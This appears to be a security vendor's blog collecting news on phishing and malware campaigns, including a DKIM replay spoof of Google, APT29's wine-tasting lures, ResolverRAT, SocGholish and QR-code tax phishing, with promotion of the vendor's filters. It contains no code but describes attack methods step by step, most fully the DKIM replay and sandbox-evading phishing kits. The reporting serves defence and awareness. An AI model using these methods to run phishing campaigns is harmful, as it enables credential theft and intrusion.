Phishing & Email Spam

Phishing and email spam is estimated to cost industry more than $1 billion each year, and cybercriminals are becoming more sophisticated in the campaigns they launch to try to extract confidential data or passwords from unsuspecting Internet users.

Part of the reason why phishing and email spam continue to work is the language used within the communication. The message to “Act Now” because an account seems to have been compromised, or because a colleague appears to need urgent support, often causes individuals to act before they think.

Even experienced security experts have been caught by phishing and email spam, and the advice provided to every Internet user is:

  • If you are unsure of whether an email request is legitimate, try to verify it by contacting the sender independently of the information provided in the email.
  • Never reveal confidential data or passwords requested in an email or on a web page you have arrived at after following a link in an email.
  • Enable spam filters on your email, keep your anti-virus software up-to-date and enable two-step authentication on all your accounts whenever possible.
  • Always use different passwords for different accounts, and change them frequently to avoid being a victim of key-logging malware downloads.
  • Remember that phishing and email spam is not limited to email. Watch out for scams sent via social media channels.

Phishing in particular has become a popular attack vector for cybercriminals. Although phishing goes back to the early days of AOL, there has been a tenfold increase in phishing campaigns over the past decade reported to the Anti-Phishing Working Group (APWG).

Phishing is an extension of spam mail and can target small groups of people (spear phishing) or target executive-level management (whale phishing) in order to collect information or gain access to computer systems.

The best way to protect yourself from phishing and email spam is to follow the advice provided above and – most importantly – enable a reputable spam filter to block potentially unsafe emails from being delivered to your inbox.

DKIM Replay Phishing Attempt Spoofs Google and Passes Validation Checks

Hackers have exploited a ‘vulnerability’ to conduct a phishing campaign that made it appear that the phishing email had been sent by Google from the no-reply[@]accounts.google.com address. The email was signed by Google and passed the DomainKeys Identified Mail (DKIM) authentication check, suggesting the email had been sent from a genuine Google account and was authentic, although the email had been sent from a different, non-Google address.

The campaign was identified by developer Nick Johnson, who received an email seemingly sent from no-reply[@]accounts.google.com with the subject Security Alert. The email claimed that Google LLC had been subpoenaed to obtain a copy of the contents of his Google account and that a support case had been opened and transferred to Legal Investigations Support. A support reference number was included along with a link to a Google Sites website, encouraging him to click the link to examine the case materials and “submit a protest,” if necessary, via the option on the support website.

The lure used in this phishing attempt is similar to many other phishing campaigns that threaten legal action or warn about police investigations, although what makes the attempt stand out is how the phisher managed to make the email appear to have been sent by Google and pass the DKIM authentication check, resulting in the email being delivered to his inbox.

While the subject matter was potentially serious, and the email had seemingly been sent by Google, there was a red flag that suggested a phishing attempt. As was noticed by Johnson, the link in the email did direct him to an official Google site, but it was sites.google.com, a free web-building platform provided by Google for users to create and host free web pages for personal purposes. No official email from Google would direct a user to that platform, and certainly not any message about a subpoena requiring the disclosure of the contents of their Google email account. The link directed Johnson to a fake support portal – a carbon copy of the official support portal, which had been scraped from the official site. The aim of the phish appears to have been to trick Johnson into logging in and disclosing his login credentials, allowing his Google account to be hijacked.

An analysis of the phishing attempt revealed Google was tricked into signing the email, thus allowing the message to bypass spam filtering service since the email successfully passed the DKIM and DMARC authentication checks. Closer inspection of the message header revealed the mailed-by address was different from the from address, and had been sent in what is known as a DKIM replay attack.

The message was actually sent to a me@ address at a domain that appeared to be managed by Google. According to Johnson, the attackers registered a domain and created a Google account for the me[@]domain.com, then created a Google OAuth app and used the entire phishing message for its name, which was then added to the name field. They granted themselves access to the email address in Google Workspace, then Google sent an alert to the me[@]domain.com account. The email was then forwarded to Johnson, and since the email had been generated by Google, it was able to pass the DKIM check as the parts of the message that DKIM checks had not been altered.

The vulnerability that was exploited was the fact that DKIM checks the message and the headers, not the envelope, which meant the email passed the validation checks because it had a valid signature. Since the exact email was extracted and saved without making any modifications to what was signed by DKIM, the validation checks were passed. Further, since the email was sent to a me@ email address, it shows that the message was delivered to the victim’s email address. Google explained in response to a query that it is aware of the phishing attempt and has rolled out protections to prevent further abuse.

The phishing attempt demonstrates the importance of stopping and thinking before clicking on any link in an email, no matter how serious the potential threat. The phishing attempt could have easily led to a compromised Google account had he not stopped to think about the request. Others may not have been as fortunate. While this was the first time that Google is known to have been affected by a DKIM replay attack, it is a known phishing technique and one that can be highly effective.

Security awareness training should make it clear that all emails can potentially contain a threat, even if the sender appears to be legitimate. Phishing lures related to legal threats, police investigations, and subpoenas should be included in the training as these are likely to create the fear that leads to a rapid click, and employees should be told to inspect the message headers to see the sender’s address and told to report any potential threat or suspicious email to their security team. They should also be provided with an easy one-click method of doing so in their email client.

Businesses should also ensure they have advanced anti-spam software with email sandboxing and URL filtering, and have multifactor authentication set up for all email accounts, with phishing-resistant multifactor authentication implemented when possible for the greatest protection.

Email Validation Identified in Sophisticated Phishing Campaigns

Sophisticated phishing campaigns have been identified that avoid detection by ensuring that only approved targets are funneled to the phishing pages where login credentials are harvested. In a standard phishing campaign, a threat actor sends out tens of thousands of phishing emails to an email list. Many lists are freely available but can also be purchased cheaply on dark web marketplaces. This approach is often referred to as spray and pray – send out large numbers of untargeted emails in the knowledge that a small but significant number of individuals will respond.

A variety of lures and social engineering techniques are used to trick the recipient into clicking a link in the email that directs them to a phishing page. The phishing page mimics a well-known company and informs the victim that they need to provide their login credentials to access the content they are expecting. When credentials are harvested, they are captured and used to log in to the user’s account. The phishing infrastructure used by threat actors is often identified and the URLS are added to real-time blacklists, after which they will be blocked by email security solutions. Phishing pages are often detected by crawlers and sandboxing environments and once a phishing page is added to a real-time blacklist, far fewer individuals would be directed to the page. The threat actor would then need to switch to a clean URL, one that has not been previously detected, to continue with the campaign.

One new technique recently observed in phishing campaigns involves limiting redirects to phishing pages to ensure that only approved targets access the phishing pages, helping to prolong the lifespan of the phishing pages by preventing them from being accessed by crawlers and sandbox environments. To analyze potential phishing pages, test credentials are entered. A legitimate login page would reject the credentials since they are invalid, but a phishing page would generally capture the data and redirect the user to a URL of the threat actor’s choosing. That could be the genuine login page of the service they are impersonating. The new technique validates the email addresses that are entered. If the email address is not on the original phishing list, the login attempt will be rejected and there will be no redirect to the phishing page, thus preventing analysis.  This is achieved by adding validation scripts to phishing pages capable of validating email addresses in real-time or alternatively through API integrations. While this approach adds sophistication that would likely be unavailable to less skilled cybercriminals, these tools are now being included in phishing kits. Phishing kits provide the infrastructure so that even low-skilled cybercriminals can conduct highly sophisticated phishing campaigns. The kits, which can be used for a fee, can also include tools to bypass multi-factor authentication.

The increasing sophistication of phishing campaigns means businesses need to implement sophisticated phishing defenses, which means adopting a defense-in-depth approach with multiple overlapping layers of protection. In practice, that means a spam filtering service to prevent phishing emails from reaching their intended targets. Advanced spam filters for incoming mail, such as SpamTitan, incorporate multiple layers of protection by analyzing every aspect of incoming emails and subjecting them to in-depth analysis to validate their legitimacy. This includes antivirus engines for malware detection, email sandboxing for in-depth analysis of files to identify novel malware, and AI and machine learning to identify phishing and other malicious content, including checks of how an email deviates from typical emails received from a business. The SpamTitan enterprise spam filter also includes multiple validation checks of the sender’s email and domain, greylisting to initially reject messages and request resending to block spam, and allow-listing, blocking, and dedicated blocklists created through extensive threat intelligence gathering.

An anti-phishing solution is recommended for Microsoft 365 environments to catch the malicious emails that Microsoft often misses. The PhishTitan anti-phishing solution integrates seamlessly with Microsoft 365, blocking more threats by augmenting Microsoft’s defenses with the same engine that powers SpamTitan. PhishTitan also adds banners to inbound emails from external sources to alert users to potential risks and combats spoofing and masking by rewriting URLs, showing their true destination. In independent tests, TitanHQ’s email security suite has been proven to provide exceptional protection against phishing, spam, and malware with 100% detection rates in Q4, 2024, and more than 99.99% accuracy in Q1, 2025.

Multifactor authentication should be configured for all email accounts to provide an additional layer of protection, and all users should be provided with ongoing security awareness training. For the most effective training, it should be conducted continuously in small chunks each month rather than an annual training session. A phishing simulator should also be used to reinforce training and identify individuals who fail to recognize phishing attempts to ensure they can be provided with the additional training they need. The SafeTitan security awareness training and phishing simulation platform makes this easy for businesses.

Give the TitanHQ team a call for more information on increasing the sophistication of your email defenses. All TitanHQ solutions are also available on a free trial to allow you to put them to the test in your own environment before making a purchase decision.

The Human Element is Involved in 60% of Data Breaches

The latest data from Verizon has revealed that phishing was the third most common method of initial access in the data breaches the firm analyzed for its 2025 Data Breach Investigations Report. Phishing accounted for 16% of all data breaches in 2025, having been overtaken by vulnerability exploitation (20%). The leading initial access method was credential misuse, which was involved in 22% of data breaches. Verizon does note, however, that while incident responders may identify compromised credentials as the cause, it is not always clear how those credentials were obtained. It is possible that they were obtained in a previous phishing attack that went undetected, so phishing may have been involved in a higher percentage of data breaches.

The report highlights the extent to which cybercriminals exploit human weaknesses. The human element was involved in approximately 60% of data breaches in 2024, down slightly from the 61% of data breaches the previous year. The human element could involve a click on a link in a phishing email, resulting in the theft of credentials, a visit to a malicious website where malware is downloaded, a misconfiguration that is exploited, or a response to a phone call or text message. In 32% of data breaches, the human element was ascertained to result in credential abuse, 23% involved social interactions, 14% involved errors, and 7% involved interactions with malware.

This year’s report delves into the importance of security awareness training and how providing regular training can really make a difference to an organization’s security posture, especially when combined with phishing simulations. Providing training to the workforce will teach employees about security best practices, which will help to eradicate risky behaviors. Employees should be taught how to identify a phishing email and be conditioned to report any suspicious emails to their security team immediately. Phishing simulations help to reinforce training and identify individuals who have failed to apply the training. If an individual fails a phishing simulation, they can be provided with additional training to help ensure they do not make a similar identification error in the future.

The report revealed that out of the companies that provided security awareness training and conducted phishing simulations, there was a much higher reporting rate when employees had received training more recently. The baseline reporting rate was 5%, which shot up to 21% with recent training.

The data shows why it is so important to provide ongoing security awareness training to keep cybersecurity matters fresh in the mind. It is also important to incentivize employees to report potential phishing emails rather than punish those who don’t, and to clearly explain that reporting suspicious emails helps security teams to contain threats more quickly and limit the damage. It is also important to make it as easy as possible for employees to report potential threats. Ideally, employees should be able to report a potential phishing or scam email with a single click in their email client.

TitanHQ offers an email security suite that includes the SpamTitan cloud-based anti-spam service and the PhishTitan phishing prevention and remediation solution for Microsoft 365 users.  SpamTitan incorporates dual anti-virus engines for detecting known malware, email sandboxing for detecting novel threats, AI and machine-based learning algorithms for identifying phishing and spam emails, plus SPF, DKIM & DMARC, allow listing, blocking, greylisting, and dedicated real-time block lists. An email client add-in is also provided to allow employees to easily report potential threats.

The PhishTitan solution is based on the same engine that powers SpamTitan, incorporating AI and machine learning to detect phishing threats, and also adds banner notifications for emails to warn employees about potential threats from external email addresses. The remediation tools provided by PhishTitan allow security teams to rapidly respond to threats and eliminate them from their email system.

Both email security solutions have high detection accuracy and provide best-in-class protection from email threats. In recent independent tests at VirusBulletin, the solutions were demonstrated to have exceptional detection accuracy, blocking in excess of 99.99% of spam and phishing threats, and thanks to the email sandbox service, TitanHQ’s solutions blocked 100% of malware.

TitanHQ can also help with security awareness training and phishing simulations. The SafeTitan platform makes it easy to create and automate continuous security awareness training programs for the workforce. The training content is enjoyable and interactive and is delivered using computer-based training, with individual modules taking no more than 10 minutes to complete.

The training content is regularly updated and has been proven to improve security awareness and reduce susceptibility to cyber threats, especially when combined with TitanHQ’s phishing simulator. Internal simulated phishing campaigns can be created and automated, and will automatically generate additional training immediately in response to a security failure, ensuring training is delivered at the time when it is most likely to be effective.

Through security awareness training and phishing simulations, organizations can reduce the employee errors that cause so many data breaches, and by using TitanHQ’s email security suite, threats will be blocked before employees’ security awareness is put to the test.

Give the TitanHQ team a call today to discuss the best options for improving your defenses. All TitanHQ solutions are available on a free trial and assistance can be provided to help you get the most out of the free trial.

UK Government Survey Confirms Phishing is the Biggest Threat to UK Businesses

A recently published report commissioned by the UK’s Home Office and Department for Science Innovation and Technology (DSIT) has revealed that 43% of UK businesses and 30% of UK charities experienced a cybersecurity breach in the past 12 months.

While there was a slight fall in the number of businesses and charities suffering a cybersecurity incident, there was a significant increase in ransomware attacks. The survey was conducted on 2,180 businesses, 1,081 charities, and 574 educational institutions. Based on the number of confirmed cyber incidents, that equates to around 612,000 UK businesses and 61,000 UK charities experiencing a cyber breach or a cyberattack in the past 12 months.

While there was a slight decline in cyber incidents, which were confirmed by 50% of businesses in last year’s study, it is clear that hacking and other types of cyber incidents continue to pose a massive threat to UK businesses, with ransomware attacks of particular concern. According to the report, the estimated percentage of ransomware crime increased from less than half a percent in 2024 to 1% in 2025, which suggests that around 19,000 UK businesses experienced a ransomware incident in the past 12 months. 4% of large businesses and 3% of medium-sized businesses admitted to paying the ransom demand to recover their data and prevent its publication online.

The biggest cyber threat to UK businesses by some distance is phishing. Phishing is the fraudulent practice of sending emails or other messages that trick individuals into disclosing sensitive information such as login credentials or installing malware. Over the past 12 months, 93% of businesses and 95% of charities that experienced a cybercrime incident identified phishing as the cause of at least one of those incidents. Businesses that were confirmed victims of cybercrime in the past 12 months experienced an average of 30 cybercrime incidents in the past 12 months, with charities experiencing an average of 16 cybercrime incidents.

The credentials stolen in these attacks and the malware installed give cybercriminals initial access to internal networks. From there, they can deploy additional malware payloads and ransomware and steal sensitive data. The phishing problem is also getting worse for businesses, as cybercriminals are leveraging large language models (LLMs) to craft extremely convincing phishing emails and conduct phishing attacks at scale. These tools can be used to generate fake images, make phishing lures more believable, and make them harder to detect.

With phishing such a major threat and the high cost of dealing with each phishing incident, UK businesses and charities need to have email security defenses capable of detecting and blocking phishing threats, including those developed using AI and LLMs.

Phishing defenses should consist of anti-spam software, multifactor authentication, and end user security awareness training as a minimum. Advanced email filtering software incorporates antivirus software to identify known malware threats, email sandboxing for detecting novel malware threats, link scanning, and machine learning and AI-aided detection.

Over the past three quarters, SpamTitan from TitanHQ has consistently demonstrated in independent tests that it is capable of blocking even the most advanced threats, routinely achieving a 100% malware detection rate, and phishing and spam detection rates in excess of 99.99%.

TitanHQ also offers a comprehensive security awareness training and phishing simulation platform – SafeTitan – for improving awareness of cyber threats. When combined with phishing simulations, the platform has been shown to reduce employee susceptibility to phishing by up to 80%. The training content is enjoyable and memorable, and is delivered in training modules of no more than 10 minutes to maximize knowledge retention and make training easy to fit into busy workflows.

All TitanHQ solutions have been developed to provide powerful protection and advanced features, while also being easy to set up, configure, and use. Further, they are available at a price point that is affordable for businesses of all sizes. Give the TitanHQ team a call today to find out more about improving your defenses against phishing and other cyber threats. Further, TitanHQ’s cloud-based anti-spam service and security awareness training platform are available on a free trial, allowing you to put them to the test before making a purchase decision.

Wine-Tasting Phishing Emails Used to Target Embassy Staff in Malware Campaign

A phishing scam has been identified targeting staff of European embassies with an invitation to a fake wine-tasting event. Targets include European diplomats and the staff of non-European countries at embassies located in Europe. The campaign has been linked to the Russian state-sponsored hacking group, Cozy Bear (aka APT29, Midnight Blizzard), and is believed to be primarily an espionage campaign.

The aim of the campaign is to deliver a stealthy new backdoor malware dubbed GrapeLoader. The campaign, identified by Check Point, is believed to be part of a wider campaign targeting European governments, diplomats, and think tanks. The malware delivered in the campaign serves as a loader for delivering additional payloads and is used as an initial stage tool for fingerprinting and establishing persistence.

As is typical with spear phishing campaigns, considerable effort has been put into creating a lure that is likely to elicit a response. A fake diplomatic event is used, commonly related to wine tasting, with some emails offering a place at a diplomatic dinner. The messages were sent by a specific individual at a legitimate but impersonated European foreign affairs ministry. A series of follow-up messages is sent to individuals who failed to respond to the fake invite. The phishing link is also configured to redirect the user to the real foreign ministry website if it is opened outside of the expected timezone or by an automated tool.

The emails prompt the recipient to click on an embedded hyperlink that directs them to a spoofed website where they are prompted to download a file. If successful, the user downloads a zip file containing a PowerPoint executable file called wine.exe, and two hidden DLL files, one of which allows the PowerPoint file to run. The PowerPoint file is used for DLL sideloading, including the other DLL file, dubbed GrapeLoader, which is used to deliver additional payloads. GrapeLoader fingerprints the device and establishes contact with its command-and-control server. A Run registry key is added to ensure that wine.exe is executed following a reboot.

The malware has been designed to be stealthy, including masking strings in its code and only decrypting them for a short time in the memory before they are erased. This technique prevents analysis using tools such as FLOSS. The malware also makes memory pages temporarily inaccessible to evade antivirus scans. GrapeLoader is thought to lead to the delivery of a modular backdoor known as WineLoader, which has been used in previous Cozy Bear campaigns on governments and political parties.

GetShared and Other Legitimate Services Abused in Phishing Campaigns

One of the common tactics for getting phishing emails into inboxes is to use a legitimate service to send the emails, as the messages are far less likely to be blocked by email security solutions. Email security solutions perform reputation checks on email addresses and domains, and if they are determined to have been used for spamming or sending malicious emails, they are rapidly added to real-time blocklists (RBLs). If a certain trustworthiness threshold is exceeded, the messages will be blocked and quarantined, ensuring they do not reach their intended targets.

These reputation checks are often passed if emails are sent via trusted services such as Dropbox and Google Calendar, and similarly if malicious files or content are hosted on legitimate services such as OneDrive, GitHub, Google Drive, or SharePoint. The fact has not been lost on threat actors, who regularly abuse these services.

Fake login pages may be hosted on cloud storage services, and malicious files shared through them. Not only can these emails evade checks due to the good reputation of the sites, these well-known brands are familiar to end users and are often trusted, increasing the probability that credentials will be divulged or files will be downloaded.

For instance, a recent campaign abusing Dropbox used the platform to send an email about a shared file, which was also hosted on a legitimate Dropbox account. The email contained a link to a malicious PDF file, branded with the details of a company known to the targeted employees. The PDF file contained a link to another, unrelated website, where a malicious file was hosted. The phishing emails used a plausible lure to convince the user to click the link and download and execute the file.

A new campaign has recently been identified that uses a different legitimate service to evade reputation checks. The campaign, detected by security researchers at Kaspersky, was sent via a service called GetShared. While not as well-known as Google Calendar or Dropbox, the platform had a vulnerability that could be abused to send emails from a trusted domain and file-sharing service.

Similar to the Dropbox campaign, GetShared was used to send an email to targeted individuals advising them that a file had been shared with them via GetShared, as it was too large to send via email. The use of the file-sharing service seems reasonable, and the urgency was believable. The user was told that the file would be deleted after a month, and they were asked to provide a quote including the delivery time and payment terms. One of the intercepted emails targeted a designer using a shared file called DESIGN LOGO.rar.

The user was given a download button, which links to the site where the file can be downloaded. If the compressed file is opened and the contents extracted, there are several possible attack methods. An executable file could be in the compressed file that has a double file extension, making it likely that the file would be executed. Potentially, the file could contain a link to a malicious document or phishing page, although in this case, it was part of a vishing campaign. The compressed file contained contact details for the user to call, which would require a file download or disclosure of credentials or other sensitive information.

Earlier this year, a campaign was identified that used Google Calendar, with the emails sent through the platform containing a calendar invite. The invite is automatically added to the user’s Google Calendar account if they have Calendar set up and configured to automatically accept invitations. The invite contained a link to Google Forms or Google Drawings, which contained a link to a phishing website. That website impersonated a well-known brand and required the user to log in with their credentials. The campaign targeted more than 300 brands including healthcare providers, educational institutions, banks, and others, and involved thousands of emails.

Traditional email security solutions are unlikely to block emails from these trusted senders, and malicious files hosted on trusted platforms are also unlikely to be blocked. Businesses can combat these types of phishing attacks by using advanced email spam filter that incorporates AI and machine learning algorithms and email sandboxing in addition to the standard reputation checks and blacklists. The best spam filters for businesses provide multiple layers of protection to block these malicious emails and prevent them from reaching inboxes; however, due to the difficulty in distinguishing genuine from malicious communications from legitimate platforms, security awareness training is vital.

Employees should be trained on how to identify phishing emails and told not to trust emails from legitimate platforms, as while the platforms can be trusted, the content cannot. It is also recommended to use a phishing simulator to run simulations of phishing using lures that abuse trusted platforms to gauge how employees respond and provide targeted training to individuals who are tricked by these campaigns.

Stealthy New Malware Used in Targeted Campaigns on Healthcare and Pharma Firms

Healthcare organizations and pharmaceutical firms are being targeted in a phishing campaign distributing a recently discovered remote access trojan (RAT) called ResolverRAT. The campaign has been linked to infrastructure previously used to deliver information stealers such as Lumma Stealer and Rhadamathys, indicating an experienced threat actor is behind the campaign.

ResolverRAT is a stealthy RAT that runs entirely in the memory, which means it will not be detected by traditional antivirus solutions since files are not downloaded to the hard drive. Security solutions monitor Win32 API and file system operations and can detect anomalous activity; however, ResolverRAT abuses .NET ResourceResolve events, loading malicious assemblies without performing API calls, helping it evade monitoring tools.

The malware achieves persistence by adding XOR-obfuscated keys to the Windows Registry and additions to the filesystem in locations such as StartUp, Program Files, and localAppData, ensuring it is executed following a reboot. To make it more difficult to detect patterns in its callbacks to its command-and-control server, the malware communicates at random intervals. The malware is capable of data exfiltration, and even large files can be exfiltrated through a chunking process, helping to avoid detection by blending in with regular traffic. The malware has been designed to prevent analysis, and most of the components are unique, strongly suggesting it has been created from scratch by a skilled malware developer.

As with many other phishing campaigns, the ResolverRAT campaign uses social engineering techniques to trick end users. Lures are used that create a sense of urgency, demanding that action be taken immediately to prevent significant costs and legal problems. Emails used in the campaign include notices about copyright violations and other legal issues that require immediate action, along with a threat of legal consequences if the matter is not corrected immediately.

The emails contain a link to a website where the user is prompted to download and open a file to obtain more information about the legal issue – a copyright violation or legal investigation. If the link is clicked and the downloaded file is executed, ResolverRAT will be executed and will run in the memory through a DLL side-loading technique. The campaign has been conducted in multiple countries, with the lures written in the languages predominantly spoken in those countries – English, Italian, Czech, Turkish, Portuguese, Indonesian, and Hindi.

While considerable effort has been put into making the malware incredibly stealthy to evade security solutions, the delivery mechanism – phishing emails – allows infections to be blocked. It is important to use a combination of measures to block campaigns such as this. That starts with an advanced spam filtering service to block the phishing emails to prevent them from reaching end users. SpamTitan, a cloud-based anti-spam service from TitanHQ, performs reputation checks of senders, uses greylisting to identify large email runs indicative of spam, phishing, and malware distribution, subjects messages and headers to in-depth analysis, and analyzes embedded URLs and their destinations, with email sandboxing used to securely analyze message content.

Microsoft 365 users should consider augmenting Microsoft’s email security features with a third-party, dedicated anti-phishing solution. PhishTitan from TitanHQ is an anti-phishing and phishing remediation solution that improves phishing and malware detection rates for Microsoft 365, adds email banners to alert users to emails from external addresses, protects against malicious links in emails, and incorporates tools to allow malicious emails to be rapidly remediated across the entire email system. In independent tests, these solutions have been shown to block 100% of malware and in excess of 99.99% of phishing emails.

A web filter is also recommended to protect against redirects to malicious websites and block malware downloads from the Internet, adding an extra layer to your security defenses. It is also important to provide regular security awareness training to employees to show them how to identify the signs of phishing, condition them to report potential threats to their security team, and teach security best practices. Training should also be reinforced by using a phishing simulator to conduct phishing simulations internally.

Give the TitanHQ team a call today for more information on improving your defenses against phishing and malware infections to block sophisticated malware threats, including improving protection for Microsoft 365 environments. All TitanHQ solutions are available on a free trial and have been developed from the ground up to meet the needs of MSPs to help them better protect their clients against the ever-evolving cyber threat landscape.

SocGholish Malware Used to Deliver RansomHub Ransomware

RansomHub is one of the most prolific ransomware-as-a-service (RaaS) groups now that the ALPHV/BlackCat operation has shut down and the LockBit operation has been hit with successive law enforcement actions. RansomHub engages in double extortion tactics, exfiltrating sensitive data from victims’ networks and encrypting files. Victims must pay to obtain the keys to decrypt their data and to prevent the publication of the stolen data on the RansomHub data leak site. Since emerging in early 2024, the group has conducted more than 200 attacks.

As a RaaS operation, RansomHub uses affiliates to conduct attacks in exchange for a percentage of any ransom payments they generate. The affiliates each have their specialties for breaching victims’ systems, including phishing, remote desktop protocol attacks, and the exploitation of unpatched vulnerabilities. Now, a new tactic is being used – The group is using the SocGholish malware-as-a-service (MaaS) framework for initial access, especially in attacks on the government sector.

SocGholish, also known as FakeUpdates, uses an obfuscated JavaScript loader that is primarily delivered via compromised legitimate websites. After compromising a website, malicious scripts are added that redirect users to webpages that display browser update notifications. These sites use social engineering to trick visitors into downloading a browser update, as they are told that their browser has a security issue or is not functioning correctly. If the user agrees, they download a zip file that contains a JavaScript file. If that file is executed, SocGholish malware is installed.

SocGholish is a malware downloader that provides initial access to a victim’s network. The malware has been used to deliver a wide range of payloads, including AZORult, Gootloader, NetSupport, and Dridex. SocGholish has also previously been used to deliver DoppelPaymer ransomware, and now RansomHub ransomware. In the case of RansomHub, the group deploys Python-based backdoor components for RansomHub affiliates to use for initial access.

Preventing SocGholish infections is critical to preventing RansomHub ransomware attacks; however, prevention requires a defense-in-depth approach. Traffic to the compromised websites can come from emails that include embedded hyperlinks, malvertising, SEO poisoning, and links to compromised websites are also delivered to users via Google Alerts. The webpages that host the fake browser updates filter traffic, blocking access by sandboxes, which can make detection difficult.

The best approach is to use an advanced anti-spam software such as SpamTitan to block malicious emails. In the last quarterly round of testing at VirusBulletin, SpamTitan, a cloud-based antispam service from TitanHQ, ranked #1 for malware detection, phishing detection and spam blocking with a 0% false positive rate, and in the February 2025 tests, achieved a perfect score blocking 100% of malware, phishing, and spam emails. The high detection rate is due to extensive front-end tests, email sandboxing, and machine learning.

A web filter adds an important layer of protection by scanning websites for malicious content and blocking access to known malicious websites. The WebTitan DNS filter is fed extensive threat intelligence to block access to known compromised webpages, can filter websites by category, and can be configured to block downloads of executable files from the Internet. Security awareness training is vital for creating a human firewall. Employees should be informed about the risks of interacting with security warnings on the Internet, and taught how to identify phishing attempts and be instructed on security best practices. The SafeTitan security awareness training platform and phishing simulator platform make creating and automating training courses and phishing simulations a quick and easy process.

QR Code Phishing Scam Requests Verification of Tax Information

One of the ways that cybercriminals are bypassing traditional email security solutions is to use QR codes rather than embedded hyperlinks in their phishing emails. QR codes are increasingly used by businesses to drive traffic to web pages, as consumers do not need to go through the process of typing a URL into their browser. The QR code can simply be scanned with a smartphone camera, the URL will be recognized, and the web resource can be visited with a single tap of the finger.

Spam filtering services will detect links in emails, check them against blacklists of known malicious websites, and will often follow the links to find the destination URL. If the website is malicious, the email will not be delivered to the user’s inbox. By using a QR code rather than a hyperlink, there is an increased chance that the message will be delivered, as many anti-spam software solutions are incapable of reading QR codes.

One such campaign has recently been identified that warns the recipient that they must review and update their tax records. The email has the subject, “urgent reminder,” and claims to have been sent by the Tax Services Team. The email has a PDF file attachment and advises the recipient that a review of their tax records must be completed by April 16, 2025, to avoid potential penalties. Tax season is well underway and annual tax returns need to be submitted by April 15, 2025, so the deadline for a response is plausible.

Rather than include a link, the PDF file includes a QR code, which the user is told they should scan with their mobile device to access the secure tax portal, where they must log in, review their tax information, and confirm it is up to date.

If the QR code is scanned and the link followed, the user must first pass a CAPTCHA test, after which they are presented with a Microsoft login prompt and asked to enter their password. The form is already populated with the user’s email address to make it appear that the user is known or has visited the site before, adding an air of legitimacy to the scam. If the password is entered, it will be captured and used to hijack the user’s Microsoft account. After entering the password, the user is told “We could not find an account with that username. Try another account,” which may allow the attacker to steal credentials for another account.

QR code phishing forces users onto a mobile device, which typically has weaker security than a desktop computer or laptop, plus only the domain name can usually be viewed rather than the full URL, which helps to make the link seem legitimate. Phishers also often use open redirects on legitimate websites to make their links appear authentic and hide the final destination URL.

With QR code phishing scams on the rise, it is important to raise awareness of the threat through your security awareness training program. Employees should be warned that QR codes are commonly used by threat actors, and never to follow links encoded in QR codes that arrive via email. It is also recommended to use a phishing simulator to assess whether the workforce is susceptible to QR code phishing attempts. The SafeTitan security awareness training platform allows businesses to easily conduct phishing simulations on the workforce to gauge susceptibility to phishing threats. The phishing simulator will generate relevant training content immediately if a phishing test is failed, ensuring targeted training content is delivered immediately, when it is likely to be most effective at correcting behavior.

Technical defenses should also be implemented. An advanced spam filtering service should be used that is capable of identifying QR codes and following and assessing URLs for phishing content and malware. The outbound spam filter of SpamTitan is capable of following QR codes and assessing content, and in recent tests, correctly identified 100% of phishing attempts. SpamTitan also includes email sandboxing for in-depth analysis of email attachments. A DNS security solution is also recommended for in-depth analysis of URLs for malicious content to provide an extra layer of protection against phishing and malware.

New Phishing Kit Dynamically Displays Relevant Landing Pages Based on DNS Queries

A new phishing-as-a-service (PhaaS) platform has been identified that highlights the sophistication of phishing attacks, and how even cybercriminals with limited skill sets can conduct extremely effective phishing campaigns.

One of the problems when conducting phishing campaigns is ensuring the phishing emails are convincing. Phishing has traditionally been a numbers game, where large volumes of messages are sent in the knowledge that a small number of individuals will be tricked into responding. Those individuals may simply be busy and respond without taking the time to carefully consider what they are being asked, or individuals with poor security awareness. Targeted phishing attempts, termed spear phishing, involve research and are tailored to individuals or small numbers of individuals, and because of the targeting, there is a much higher response rate. The trade-off is that these campaigns involve considerable time and effort.

The new PhaaS platform allows a threat actor to tailor the content to display a fake login page relevant to the individual receiving the message, while still sending a large volume of phishing emails. The phishing kit allows individuals to be tricked by displaying a login prompt that impersonates any of 114 brands in around a dozen different languages, with the content displayed tailored to each individual. The threat actor configures the phishing campaign, sends out phishing emails via the PhaaS kit, and the link in the email directs the recipient to a phishing webpage. The next stage is where the targeting occurs. The threat actor queries the email domain DNS MX records (DNS over HTTPS) obtained from Cloudflare or Google to identify the user’s email service provider. The phishing page is then dynamically displayed based on the results of that query, and if no response is received, the phishing page defaults to Roundcube.

DNS queries are fast, so the query and response occur in a fraction of a second, as is the case when a DNS query is sent to identify the IP address of a webpage when browsing the internet. As such, there is only a very small delay, often unnoticeable to the user, before the content is loaded. The result is that if the user’s email service provider is Gmail, they will be presented with a Gmail login prompt, and if they use Microsoft Outlook, they will be presented with a Microsoft login prompt. If the user responds and enters their login credentials, they are captured and sent to the collection server, and the user is redirected to the real login page for that service, most likely unaware that they have been phished. The phishing campaign was identified by InfoBlox, which identified thousands of phishing emails sent via the kit. While the kit appears to have been first used in 2020, since then the number of brands being impersonated has increased considerably, with support also provided to target users in several languages.

The phishing kit demonstrates the sophistication of phishing attacks and how threat actors are increasing the effectiveness of their campaigns. Businesses should respond to the evolving threat landscape by adopting a defense-in-depth approach that includes a DNS filtering solution such as WebTitan, advanced spam filtering software such as SpamTitan, and ongoing security awareness training and phishing simulations for the workforce to raise awareness of threats and reduce susceptibility to phishing attempts, using a solution such as SafeTitan.

Hackers Using Free File Conversion Tools for Malware Delivery

Malware is often packaged with software solutions, where the user is given the software they are looking for, but the installer also silently delivers malware to their device. Since the desired product is installed, the user will be unaware that their device has been infected. Malware is often hidden in installers for pirated software or the associated keygen for obtaining the product key. All a threat actor has to do is convince a user to download and execute the installer.

One such campaign involves the use of online document converters, which are used to convert one file type to another. For example, these tools can be used to convert .docx files to .pdf files, create .pdf files from multiple .jpeg images, or convert one audio or video format to another. The Federal Bureau of Investigation (FBI) has been receiving an increasing number of complaints about malware infections from free document converters and download tools. The tool is delivered, but malware is also installed that provides the threat actor with remote access to the infected device, allowing them to steal sensitive data, encrypt files with ransomware, or use the infected device for other nefarious purposes. There are other risks associated with this scam. Cybercriminals in control of these tools are able to scrape sensitive information from the converted files, including passwords, cryptocurrency seeds, email addresses, banking information, and Social Security numbers. Any file uploaded to any online service risks a disclosure of sensitive information.

